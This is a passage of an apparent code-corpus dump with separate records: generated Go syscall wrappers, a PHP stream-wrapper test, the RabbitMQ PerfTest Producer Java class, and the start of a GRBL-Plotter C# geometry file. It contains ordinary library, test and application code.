BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(link)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_SYMLINK, uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(_p1)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Symlinkat(oldpath string, newdirfd int, newpath string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(oldpath)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(newpath)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_SYMLINKAT, uintptr(unsafe.Pointer(_p0)), uintptr(newdirfd), uintptr(unsafe.Pointer(_p1)))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Sync() (err error) {\n\t_, _, e1 := Syscall(SYS_SYNC, 0, 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Truncate(path string, length int64) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_TRUNCATE, uintptr(unsafe.Pointer(_p0)), uintptr(length), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Umask(newmask int) (oldmask int) {\n\tr0, _, _ := Syscall(SYS_UMASK, uintptr(newmask), 0, 0)\n\toldmask = int(r0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Undelete(path string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_UNDELETE, uintptr(unsafe.Pointer(_p0)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Unlink(path string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_UNLINK, uintptr(unsafe.Pointer(_p0)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Unlinkat(dirfd int, path string, flags int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_UNLINKAT, uintptr(dirfd), uintptr(unsafe.Pointer(_p0)), uintptr(flags))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Unmount(path string, flags int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_UNMOUNT, uintptr(unsafe.Pointer(_p0)), uintptr(flags), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc write(fd int, p []byte) (n int, err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(p) > 0 {\n\t\t_p0 = unsafe.Pointer(&p[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall(SYS_WRITE, uintptr(fd), uintptr(_p0), uintptr(len(p)))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos int64) (ret uintptr, err error) {\n\tr0, _, e1 := Syscall6(SYS_MMAP, uintptr(addr), uintptr(length), uintptr(prot), uintptr(flag), uintptr(fd), uintptr(pos))\n\tret = uintptr(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc munmap(addr uintptr, length uintptr) (err error) {\n\t_, _, e1 := Syscall(SYS_MUNMAP, uintptr(addr), uintptr(length), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc readlen(fd int, buf *byte, nbuf int) (n int, err error) {\n\tr0, _, e1 := Syscall(SYS_READ, uintptr(fd), uintptr(unsafe.Pointer(buf)), uintptr(nbuf))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc writelen(fd int, buf *byte, nbuf int) (n int, err error) {\n\tr0, _, e1 := Syscall(SYS_WRITE, uintptr(fd), uintptr(unsafe.Pointer(buf)), uintptr(nbuf))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc accept4(fd int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) (nfd int, err error) {\n\tr0, _, e1 := Syscall6(SYS_ACCEPT4, uintptr(fd), uintptr(unsafe.Pointer(rsa)), uintptr(unsafe.Pointer(addrlen)), uintptr(flags), 0, 0)\n\tnfd = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc utimensat(dirfd int, path string, times *[2]Timespec, flags int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall6(SYS_UTIMENSAT, uintptr(dirfd), uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(times)), uintptr(flags), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n"} {"text": "--TEST--\nfopencookie detected and working (or cast mechanism works)\n--FILE--\ndata, $this->position, $count);\n\t\t$this->position += strlen($ret);\n\t\treturn $ret;\n\t}\n\n\tfunction stream_tell()\n\t{\n\t\treturn $this->position;\n\t}\n\n\tfunction stream_eof()\n\t{\n\t\treturn $this->position >= strlen($this->data);\n\t}\n\n\tfunction stream_seek($offset, $whence)\n\t{\n\t\tswitch($whence) {\n\t\t\tcase SEEK_SET:\n\t\t\t\tif ($offset < strlen($this->data) && $offset >= 0) {\n\t\t\t\t\t$this->position = $offset;\n\t\t\t\t\treturn true;\n\t\t\t\t} else {\n\t\t\t\t\treturn false;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase SEEK_CUR:\n\t\t\t\tif ($offset >= 0) {\n\t\t\t\t\t$this->position += $offset;\n\t\t\t\t\treturn true;\n\t\t\t\t} else {\n\t\t\t\t\treturn false;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase SEEK_END:\n\t\t\t\tif (strlen($this->data) + $offset >= 0) {\n\t\t\t\t\t$this->position = strlen($this->data) + $offset;\n\t\t\t\t\treturn true;\n\t\t\t\t} else {\n\t\t\t\t\treturn false;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\treturn false;\n\t\t}\n\t}\n\tfunction stream_stat() {\n\t\treturn array('size' => strlen($this->data));\n\t}\n}\n\nstream_wrapper_register(\"cookietest\", \"userstream\");\n\ninclude(\"cookietest://foo\");\n\n?>\n--EXPECT--\nIf you can read this, it worked\n"} {"text": "// Copyright (c) 2007-2020 Pivotal Software, Inc. All rights reserved.\n//\n// This software, the RabbitMQ Java client library, is triple-licensed under the\n// Mozilla Public License 1.1 (\"MPL\"), the GNU General Public License version 2\n// (\"GPL\") and the Apache License version 2 (\"ASL\"). For the MPL, please see\n// LICENSE-MPL-RabbitMQ. For the GPL, please see LICENSE-GPL2. For the ASL,\n// please see LICENSE-APACHE2.\n//\n// This software is distributed on an \"AS IS\" basis, WITHOUT WARRANTY OF ANY KIND,\n// either express or implied. See the LICENSE file for specific language governing\n// rights and limitations of this software.\n//\n// If you have any questions regarding licensing, please contact us at\n// info@rabbitmq.com.\n\npackage com.rabbitmq.perf;\n\nimport com.rabbitmq.client.AMQP;\nimport com.rabbitmq.client.Channel;\nimport com.rabbitmq.client.ConfirmListener;\nimport com.rabbitmq.client.ReturnListener;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport java.io.IOException;\nimport java.time.OffsetDateTime;\nimport java.util.Arrays;\nimport java.util.Collection;\nimport java.util.Collections;\nimport java.util.Date;\nimport java.util.HashMap;\nimport java.util.Map;\nimport java.util.Random;\nimport java.util.UUID;\nimport java.util.concurrent.ConcurrentNavigableMap;\nimport java.util.concurrent.ConcurrentSkipListMap;\nimport java.util.concurrent.Semaphore;\nimport java.util.concurrent.TimeUnit;\nimport java.util.concurrent.atomic.AtomicBoolean;\nimport java.util.concurrent.atomic.AtomicInteger;\nimport java.util.function.Function;\nimport java.util.function.Supplier;\n\nimport static java.util.stream.Collectors.toMap;\n\npublic class Producer extends AgentBase implements Runnable, ReturnListener,\n ConfirmListener\n{\n\n private static final Logger LOGGER = LoggerFactory.getLogger(Producer.class);\n\n public static final String TIMESTAMP_PROPERTY = \"timestamp\";\n public static final String CONTENT_TYPE_PROPERTY = \"contentType\";\n public static final String CONTENT_ENCODING_PROPERTY = \"contentEncoding\";\n public static final String DELIVERY_MODE_PROPERTY = \"deliveryMode\";\n public static final String PRIORITY_PROPERTY = \"priority\";\n public static final String CORRELATION_ID_PROPERTY = \"correlationId\";\n public static final String REPLY_TO_PROPERTY = \"replyTo\";\n public static final String EXPIRATION_PROPERTY = \"expiration\";\n public static final String MESSAGE_ID_PROPERTY = \"messageId\";\n public static final String TYPE_PROPERTY = \"type\";\n public static final String USER_ID_PROPERTY = \"userId\";\n public static final String APP_ID_PROPERTY = \"appId\";\n public static final String CLUSTER_ID_PROPERTY = \"clusterId\";\n public static final String TIMESTAMP_HEADER = TIMESTAMP_PROPERTY;\n static final String STOP_REASON_PRODUCER_MESSAGE_LIMIT = \"Producer reached message limit\";\n static final String STOP_REASON_PRODUCER_THREAD_INTERRUPTED = \"Producer thread interrupted\";\n static final String STOP_REASON_ERROR_IN_PRODUCER = \"Error in producer\";\n private final Channel channel;\n private final String exchangeName;\n private final String id;\n private final boolean mandatory;\n private final boolean persistent;\n private final int txSize;\n private final int msgLimit;\n\n private final Stats stats;\n\n private final MessageBodySource messageBodySource;\n\n private final Function propertiesBuilderProcessor;\n private final Semaphore confirmPool;\n private final int confirmTimeout;\n private final int maxOutstandingConfirms;\n\n private final ConcurrentNavigableMap unconfirmed = new ConcurrentSkipListMap<>();\n\n private final MulticastSet.CompletionHandler completionHandler;\n private final AtomicBoolean completed = new AtomicBoolean(false);\n\n private final Supplier routingKeyGenerator;\n\n private final int randomStartDelay;\n\n private final Recovery.RecoveryProcess recoveryProcess;\n\n private final boolean shouldTrackPublishConfirms;\n\n private final TimestampProvider timestampProvider;\n\n private final ValueIndicator rateIndicator;\n\n public Producer(ProducerParameters parameters) {\n this.channel = parameters.getChannel();\n this.exchangeName = parameters.getExchangeName();\n this.id = parameters.getId();\n this.mandatory = parameters.getFlags().contains(\"mandatory\");\n this.persistent = parameters.getFlags().contains(\"persistent\");\n\n Function builderProcessor = Function.identity();\n this.txSize = parameters.getTxSize();\n this.msgLimit = parameters.getMsgLimit();\n this.messageBodySource = parameters.getMessageBodySource();\n this.timestampProvider = parameters.getTsp();\n if (this.timestampProvider.isTimestampInHeader()) {\n builderProcessor = builderProcessor.andThen(builder -> builder.headers(Collections.singletonMap(TIMESTAMP_HEADER, parameters.getTsp().getCurrentTime())));\n }\n if (parameters.getMessageProperties() != null && !parameters.getMessageProperties().isEmpty()) {\n builderProcessor = builderProcessorWithMessageProperties(parameters.getMessageProperties(), builderProcessor);\n }\n\n this.shouldTrackPublishConfirms = shouldTrackPublishConfirm(parameters);\n\n if (parameters.getConfirm() > 0) {\n this.confirmPool = new Semaphore((int) parameters.getConfirm());\n this.confirmTimeout = parameters.getConfirmTimeout();\n this.maxOutstandingConfirms = (int) parameters.getConfirm();\n } else {\n this.confirmPool = null;\n this.confirmTimeout = -1;\n this.maxOutstandingConfirms = -1;\n }\n this.stats = parameters.getStats();\n this.completionHandler = parameters.getCompletionHandler();\n this.propertiesBuilderProcessor = builderProcessor;\n if (parameters.isRandomRoutingKey() || parameters.getRoutingKeyCacheSize() > 0) {\n if (parameters.getRoutingKeyCacheSize() > 0) {\n this.routingKeyGenerator = new CachingRoutingKeyGenerator(parameters.getRoutingKeyCacheSize());\n } else {\n this.routingKeyGenerator = () -> UUID.randomUUID().toString();\n }\n } else {\n this.routingKeyGenerator = () -> this.id;\n }\n this.randomStartDelay = parameters.getRandomStartDelayInSeconds();\n\n this.rateIndicator = parameters.getRateIndicator();\n this.recoveryProcess = parameters.getRecoveryProcess();\n this.recoveryProcess.init(this);\n\n }\n\n private Function builderProcessorWithMessageProperties(\n Map messageProperties,\n Function builderProcessor) {\n if (messageProperties.containsKey(CONTENT_TYPE_PROPERTY)) {\n String value = messageProperties.get(CONTENT_TYPE_PROPERTY).toString();\n builderProcessor = builderProcessor.andThen(builder -> builder.contentType(value));\n }\n if (messageProperties.containsKey(CONTENT_ENCODING_PROPERTY)) {\n String value = messageProperties.get(CONTENT_ENCODING_PROPERTY).toString();\n builderProcessor = builderProcessor.andThen(builder -> builder.contentEncoding(value));\n }\n if (messageProperties.containsKey(DELIVERY_MODE_PROPERTY)) {\n Integer value = ((Number) messageProperties.get(DELIVERY_MODE_PROPERTY)).intValue();\n builderProcessor = builderProcessor.andThen(builder -> builder.deliveryMode(value));\n }\n if (messageProperties.containsKey(PRIORITY_PROPERTY)) {\n Integer value = ((Number) messageProperties.get(PRIORITY_PROPERTY)).intValue();\n builderProcessor = builderProcessor.andThen(builder -> builder.priority(value));\n }\n if (messageProperties.containsKey(CORRELATION_ID_PROPERTY)) {\n String value = messageProperties.get(CORRELATION_ID_PROPERTY).toString();\n builderProcessor = builderProcessor.andThen(builder -> builder.correlationId(value));\n }\n if (messageProperties.containsKey(REPLY_TO_PROPERTY)) {\n String value = messageProperties.get(REPLY_TO_PROPERTY).toString();\n builderProcessor = builderProcessor.andThen(builder -> builder.replyTo(value));\n }\n if (messageProperties.containsKey(EXPIRATION_PROPERTY)) {\n String value = messageProperties.get(EXPIRATION_PROPERTY).toString();\n builderProcessor = builderProcessor.andThen(builder -> builder.expiration(value));\n }\n if (messageProperties.containsKey(MESSAGE_ID_PROPERTY)) {\n String value = messageProperties.get(MESSAGE_ID_PROPERTY).toString();\n builderProcessor = builderProcessor.andThen(builder -> builder.messageId(value));\n }\n if (messageProperties.containsKey(TIMESTAMP_PROPERTY)) {\n String value = messageProperties.get(TIMESTAMP_PROPERTY).toString();\n Date timestamp = Date.from(OffsetDateTime.parse(value).toInstant());\n builderProcessor = builderProcessor.andThen(builder -> builder.timestamp(timestamp));\n }\n if (messageProperties.containsKey(TYPE_PROPERTY)) {\n String value = messageProperties.get(TYPE_PROPERTY).toString();\n builderProcessor = builderProcessor.andThen(builder -> builder.type(value));\n }\n if (messageProperties.containsKey(USER_ID_PROPERTY)) {\n String value = messageProperties.get(USER_ID_PROPERTY).toString();\n builderProcessor = builderProcessor.andThen(builder -> builder.userId(value));\n }\n if (messageProperties.containsKey(APP_ID_PROPERTY)) {\n String value = messageProperties.get(APP_ID_PROPERTY).toString();\n builderProcessor = builderProcessor.andThen(builder -> builder.appId(value));\n }\n if (messageProperties.containsKey(CLUSTER_ID_PROPERTY)) {\n String value = messageProperties.get(CLUSTER_ID_PROPERTY).toString();\n builderProcessor = builderProcessor.andThen(builder -> builder.clusterId(value));\n }\n\n final Map headers = messageProperties.entrySet().stream()\n .filter(entry -> !isPropertyKey(entry.getKey()))\n .collect(toMap(e -> e.getKey(), e -> e.getValue()));\n\n if (!headers.isEmpty()) {\n builderProcessor = builderProcessor.andThen(builder -> {\n // we merge if there are already some headers\n AMQP.BasicProperties properties = builder.build();\n Map existingHeaders = properties.getHeaders();\n if (existingHeaders != null && !existingHeaders.isEmpty()) {\n Map newHeaders = new HashMap<>();\n newHeaders.putAll(existingHeaders);\n newHeaders.putAll(headers);\n builder = builder.headers(newHeaders);\n } else {\n builder = builder.headers(headers);\n }\n return builder;\n });\n }\n\n return builderProcessor;\n }\n\n private static final Collection MESSAGE_PROPERTIES_KEYS = Arrays.asList(\n CONTENT_TYPE_PROPERTY,\n CONTENT_ENCODING_PROPERTY,\n \"headers\",\n DELIVERY_MODE_PROPERTY,\n PRIORITY_PROPERTY,\n CORRELATION_ID_PROPERTY,\n REPLY_TO_PROPERTY,\n EXPIRATION_PROPERTY,\n MESSAGE_ID_PROPERTY,\n TIMESTAMP_HEADER,\n TYPE_PROPERTY,\n USER_ID_PROPERTY,\n APP_ID_PROPERTY,\n CLUSTER_ID_PROPERTY\n );\n\n private boolean isPropertyKey(String key) {\n return MESSAGE_PROPERTIES_KEYS.contains(key);\n }\n\n private boolean shouldTrackPublishConfirm(ProducerParameters parameters) {\n return parameters.getConfirm() > 0;\n }\n\n public void handleReturn(int replyCode,\n String replyText,\n String exchange,\n String routingKey,\n AMQP.BasicProperties properties,\n byte[] body) {\n stats.handleReturn();\n }\n\n public void handleAck(long seqNo, boolean multiple) {\n handleAckNack(seqNo, multiple, false);\n }\n\n public void handleNack(long seqNo, boolean multiple) {\n handleAckNack(seqNo, multiple, true);\n }\n\n private void handleAckNack(long seqNo, boolean multiple,\n boolean nack) {\n int numConfirms;\n\n if (nack) {\n numConfirms = processNack(seqNo, multiple);\n } else {\n numConfirms = processAck(seqNo, multiple);\n }\n\n if (confirmPool != null && numConfirms > 0) {\n confirmPool.release(numConfirms);\n }\n }\n\n private int processAck(long seqNo, boolean multiple) {\n int numConfirms;\n long currentTime = this.timestampProvider.getCurrentTime();\n long[] latencies;\n if (multiple) {\n ConcurrentNavigableMap confirmed = unconfirmed.headMap(seqNo, true);\n numConfirms = confirmed.size();\n latencies = new long[numConfirms];\n int index = 0;\n for (Map.Entry entry : confirmed.entrySet()) {\n latencies[index] = this.timestampProvider.getDifference(currentTime, entry.getValue());\n index++;\n }\n confirmed.clear();\n } else {\n Long messageTimestamp = unconfirmed.remove(seqNo);\n if (messageTimestamp != null) {\n latencies = new long[] {this.timestampProvider.getDifference(currentTime, messageTimestamp)};\n } else {\n latencies = new long[0];\n }\n numConfirms = 1;\n }\n stats.handleConfirm(numConfirms, latencies);\n return numConfirms;\n }\n\n private int processNack(long seqNo, boolean multiple) {\n int numConfirms;\n if (multiple) {\n ConcurrentNavigableMap confirmed = unconfirmed.headMap(seqNo, true);\n numConfirms = confirmed.size();\n confirmed.clear();\n } else {\n unconfirmed.remove(seqNo);\n numConfirms = 1;\n }\n stats.handleNack(numConfirms);\n return numConfirms;\n }\n\n public void run() {\n if (randomStartDelay > 0) {\n int delay = new Random().nextInt(randomStartDelay) + 1;\n try {\n Thread.sleep((long) delay * 1000);\n } catch (InterruptedException e) {\n Thread.currentThread().interrupt();\n throw new RuntimeException(e);\n }\n }\n long now;\n final long startTime;\n startTime = now = System.currentTimeMillis();\n ProducerState state = new ProducerState(this.rateIndicator);\n state.setLastStatsTime(startTime);\n state.setMsgCount(0);\n final boolean variableRate = this.rateIndicator.isVariable();\n try {\n while (keepGoing(state)) {\n delay(now, state);\n if (variableRate && this.rateIndicator.getValue() == 0.0f) {\n // instructed not to publish, so waiting\n waitForOneSecond();\n } else {\n handlePublish(state);\n }\n now = System.currentTimeMillis();\n // if rate is variable, we need to reset producer stats every second\n // otherwise pausing to throttle rate will be based on the whole history\n // which is broken when rate varies\n if (variableRate && now - state.getLastStatsTime() > 1000) {\n state.setLastStatsTime(now);\n state.setMsgCount(0);\n }\n }\n } catch (PerfTestException pte) {\n countDown(pte.getMessage());\n throw pte;\n } catch (Exception e) {\n LOGGER.debug(\"Error in publisher\", e);\n String reason;\n if (e.getCause() instanceof InterruptedException && this.rateIndicator.getValue() != 0.0f) {\n // likely to have been interrupted while sleeping to honor rate limit\n reason = STOP_REASON_PRODUCER_THREAD_INTERRUPTED;\n } else {\n reason = STOP_REASON_ERROR_IN_PRODUCER + \" (\" + e.getMessage() + \")\";\n }\n // failing, we don't want to block the whole process, so counting down\n countDown(reason);\n throw e;\n }\n if (state.getMsgCount() >= msgLimit) {\n String reason;\n if (msgLimit == 0) {\n reason = STOP_REASON_PRODUCER_THREAD_INTERRUPTED;\n } else {\n reason = STOP_REASON_PRODUCER_MESSAGE_LIMIT;\n }\n countDown(reason);\n }\n }\n\n private void waitForOneSecond() {\n try {\n Thread.sleep(1000L);\n } catch (InterruptedException e) {\n Thread.currentThread().interrupt();\n throw new RuntimeException(e);\n }\n }\n\n private boolean keepGoing(AgentState state) {\n return (msgLimit == 0 || state.getMsgCount() < msgLimit) && !Thread.interrupted();\n }\n\n public Runnable createRunnableForScheduling() {\n final AtomicBoolean initialized = new AtomicBoolean(false);\n // make the producer state thread-safe for what we use in this case\n final ProducerState state = new ProducerState(this.rateIndicator) {\n final AtomicInteger messageCount = new AtomicInteger(0);\n @Override\n protected void setMsgCount(int msgCount) {\n messageCount.set(msgCount);\n }\n @Override\n public int getMsgCount() {\n return messageCount.get();\n }\n\n @Override\n public int incrementMessageCount() {\n return messageCount.incrementAndGet();\n }\n };\n return () -> {\n if (initialized.compareAndSet(false, true)) {\n state.setLastStatsTime(System.currentTimeMillis());\n state.setMsgCount(0);\n }\n try {\n maybeHandlePublish(state);\n } catch(PerfTestException pte) {\n // failing, we don't want to block the whole process, so counting down\n countDown(pte.getMessage());\n throw pte;\n } catch (Exception e) {\n // failing, we don't want to block the whole process, so counting down\n countDown(\"Error in scheduled producer (\" + e.getMessage() + \")\");\n throw e;\n }\n };\n }\n\n public void maybeHandlePublish(AgentState state) {\n if (keepGoing(state)) {\n handlePublish(state);\n } else {\n String reason;\n if (messageLimitReached(state)) {\n reason = STOP_REASON_PRODUCER_MESSAGE_LIMIT;\n } else {\n reason = STOP_REASON_PRODUCER_THREAD_INTERRUPTED;\n }\n countDown(reason);\n }\n }\n\n private boolean messageLimitReached(AgentState state) {\n if (msgLimit == 0) {\n return false;\n } else {\n return state.getMsgCount() >= msgLimit;\n }\n }\n\n public void handlePublish(AgentState currentState) {\n if (!this.recoveryProcess.isRecoverying()) {\n try {\n maybeWaitIfTooManyOutstandingPublishConfirms();\n\n dealWithWriteOperation(() -> publish(messageBodySource.create(currentState.getMsgCount())), this.recoveryProcess);\n\n int messageCount = currentState.incrementMessageCount();\n\n commitTransactionIfNecessary(messageCount);\n stats.handleSend();\n } catch (IOException e) {\n throw new RuntimeException(e);\n } catch (InterruptedException e) {\n Thread.currentThread().interrupt();\n throw new RuntimeException (e);\n }\n } else {\n // The connection is recovering, waiting a bit.\n // The duration is arbitrary: don't want to empty loop\n // too much and don't want to catch too late with recovery\n try {\n LOGGER.debug(\"Recovery in progress, sleeping for a sec\");\n Thread.sleep(1000L);\n } catch (InterruptedException e) {\n Thread.currentThread().interrupt();\n }\n }\n }\n\n private void maybeWaitIfTooManyOutstandingPublishConfirms() throws InterruptedException {\n if (confirmPool != null) {\n if (confirmTimeout < 0) {\n confirmPool.acquire();\n } else {\n boolean acquired = confirmPool.tryAcquire(confirmTimeout, TimeUnit.SECONDS);\n if (!acquired) {\n // waiting for too long, broker may be gone, stopping thread\n throw new PerfTestException(\"Waiting for publisher confirms for too long\");\n }\n }\n }\n }\n\n private void commitTransactionIfNecessary(int messageCount) throws IOException {\n if (txSize != 0 && messageCount % txSize == 0) {\n dealWithWriteOperation(() -> channel.txCommit(), this.recoveryProcess);\n }\n }\n\n private void publish(MessageBodySource.MessageEnvelope messageEnvelope)\n throws IOException {\n\n AMQP.BasicProperties.Builder propertiesBuilder = new AMQP.BasicProperties.Builder();\n if (persistent) {\n propertiesBuilder.deliveryMode(2);\n }\n\n if (messageEnvelope.getContentType() != null) {\n propertiesBuilder.contentType(messageEnvelope.getContentType());\n }\n\n propertiesBuilder = this.propertiesBuilderProcessor.apply(propertiesBuilder);\n\n AMQP.BasicProperties messageProperties = propertiesBuilder.build();\n\n if (shouldTrackPublishConfirms) {\n if (this.timestampProvider.isTimestampInHeader()) {\n Long timestamp = (Long) messageProperties.getHeaders().get(TIMESTAMP_HEADER);\n unconfirmed.put(channel.getNextPublishSeqNo(), timestamp);\n } else {\n unconfirmed.put(channel.getNextPublishSeqNo(), messageEnvelope.getTime());\n }\n }\n channel.basicPublish(exchangeName, routingKeyGenerator.get(),\n mandatory, false,\n messageProperties,\n messageEnvelope.getBody());\n }\n\n private void countDown(String reason) {\n if (completed.compareAndSet(false, true)) {\n completionHandler.countDown(reason);\n }\n }\n\n @Override\n public void recover(TopologyRecording topologyRecording) {\n maybeResetConfirmPool();\n }\n\n private void maybeResetConfirmPool() {\n if (this.confirmPool != null) {\n // reset confirm pool. If the producer is waiting for confirms,\n // it will move on without failing because of a confirm timeout, which is good,\n // considering there has been a re-connection.\n int usedPermits = maxOutstandingConfirms - this.confirmPool.availablePermits();\n this.confirmPool.release(usedPermits);\n LOGGER.debug(\"Resetting confirm pool in producer, used permit(s) {}, now {} available\", usedPermits, this.confirmPool.availablePermits());\n }\n }\n\n /**\n * Not thread-safe (OK for non-scheduled Producer, as it runs inside the same thread).\n */\n private static class ProducerState implements AgentState {\n\n private final ValueIndicator rateIndicator;\n private long lastStatsTime;\n private int msgCount = 0;\n\n protected ProducerState(ValueIndicator rateIndicator) {\n this.rateIndicator = rateIndicator;\n }\n\n public float getRateLimit() {\n return rateIndicator.getValue();\n }\n\n public long getLastStatsTime() {\n return lastStatsTime;\n }\n\n protected void setLastStatsTime(long lastStatsTime) {\n this.lastStatsTime = lastStatsTime;\n }\n\n public int getMsgCount() {\n return msgCount;\n }\n\n protected void setMsgCount(int msgCount) {\n this.msgCount = msgCount;\n }\n\n public int incrementMessageCount() {\n return ++this.msgCount;\n }\n\n }\n\n static class CachingRoutingKeyGenerator implements Supplier {\n\n private final String [] keys;\n private int count = 0;\n\n public CachingRoutingKeyGenerator(int cacheSize) {\n if (cacheSize <= 0) {\n throw new IllegalArgumentException(String.valueOf(cacheSize));\n }\n this.keys = new String[cacheSize];\n for (int i = 0; i < cacheSize; i++) {\n this.keys[i] = UUID.randomUUID().toString();\n }\n }\n\n @Override\n public String get() {\n if (count == keys.length) {\n count = 0;\n }\n return keys[count++ % keys.length];\n }\n }\n}\n"} {"text": "\n\n\n\n\n \n \n \n \n\n"} {"text": "/* GRBL-Plotter. Another GCode sender for GRBL.\r\n This file is part of the GRBL-Plotter application.\r\n \r\n Copyright (C) 2015-2020 Sven Hasemann contact: svenhb@web.de\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see .\r\n*/\r\n\r\n// 2020-01-10 line 113 set x,y,z=null\r\n\r\nusing System;\r\nusing System.Windows.Forms;\r\n\r\nnamespace GRBL_Plotter\r\n{\r\n /// \r\n /// Hold absolute work coordinate for given linenumber of GCode program\r\n /// \r\n class coordByLine\r\n { public int lineNumber; // line number in fCTBCode\r\n public int figureNumber;\r\n public xyPoint actualPos; // accumulates position\r\n public double alpha; // angle between old and this position\r\n public double distance; // distance to specific point\r\n public bool isArc;\r\n\r\n public coordByLine(int line, int figure, xyPoint p, double a, bool isarc)\r\n { lineNumber = line; figureNumber = figure; actualPos = p; alpha = a; distance = -1; isArc = isarc; }\r\n\r\n public coordByLine(int line, int figure, xyPoint p, double a, double dist)\r\n { lineNumber = line; figureNumber = figure; actualPos = p; alpha = a; distance = dist; isArc = false; }\r\n\r\n public void calcDistance(xyPoint tmp)\r\n { xyPoint delta = new xyPoint(tmp - actualPos);\r\n distance = Math.Sqrt(delta.X * delta.X + delta.Y * delta.Y);\r\n }\r\n }\r\n\r\n public struct xyzabcuvwPoint\r\n {\r\n public double X, Y, Z, A,B,C,U,V,W;\r\n public xyzabcuvwPoint(xyzPoint tmp)\r\n { X = tmp.X; Y = tmp.Y; Z = tmp.Z; A = tmp.A; B = 0;C = 0;U = 0;V = 0;W = 0; }\r\n\r\n public static explicit operator xyPoint(xyzabcuvwPoint tmp)\r\n { return new xyPoint(tmp.X,tmp.Y); }\r\n public static explicit 